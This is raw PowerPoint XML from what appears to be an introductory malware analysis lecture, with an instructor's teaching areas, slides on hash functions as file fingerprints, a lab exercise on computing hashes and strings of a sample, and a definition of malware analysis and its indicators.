              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="216" name="CustomShape 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="2725920" y="3288600"/>
              <a:ext cx="5760" cy="548280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9360">
              <a:solidFill>
                <a:srgbClr val="4a7dba"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="CustomShape 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4015800" y="3278880"/>
              <a:ext cx="5760" cy="548280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9360">
              <a:solidFill>
                <a:srgbClr val="4a7dba"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="218" name="CustomShape 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="5319000" y="3315960"/>
              <a:ext cx="5760" cy="548280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9360">
              <a:solidFill>
                <a:srgbClr val="4a7dba"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="219" name="CustomShape 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="6579360" y="3285720"/>
              <a:ext cx="5760" cy="548280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9360">
              <a:solidFill>
                <a:srgbClr val="4a7dba"/>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Bio</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98"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2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Teaching</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Computer networks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Broadband networks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Wireless and Sensor networks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Network security</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Malware analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Web programming</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Cloud computing</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Linux OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>IP routing</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-171000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-158400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290240" y="755280"/>
            <a:ext cx="6584040" cy="3661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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://scholar.google.com.vn/citations?hl=en&amp;user=zC4vaRAAAAAJ</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="Google Shape;110;p3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915640" y="4905000"/>
            <a:ext cx="2407320" cy="1805400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="Google Shape;111;p3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5383440" y="1421640"/>
            <a:ext cx="2868480" cy="2151000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5436000" y="4607640"/>
            <a:ext cx="1714680" cy="2011320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>MATLAB</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Li-Fi</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Hash Function</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="94000"/>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Check the integrity of a file</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Unique hash value</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Common hash functions: MD-5, SHA-256</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Application</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>- A Fingerprint (or Signature) for malware</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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Share generated hash with other analysts</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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Search for generated hash on-line to see if the file has already identified</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HashCal</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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>md5deep</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>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Practice</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223"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Files: Lab01-01.exe (or any malware file)</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Identify</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Strings: guess the purpose of the malware</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Hash: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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MD5</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SHA-1</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SHA-256</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Write a piece of code to </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Detect strings contained in a PE file</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Generate MD-5, SHA-256 code</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225"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The process of investigating the behaviour of a specific sample of malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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To determine exactly what a particular suspect binary code can do</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How to detect it on the network</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How to measure and contain its damage </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Can be used to develop indicators /signatures:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Host-based indicators</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: are used to detect malicious code on victim computers.</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i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Network-based indicators</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: are used to detect malicious code by monitoring network traffic.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>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6" name="Google Shape;373;p33" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
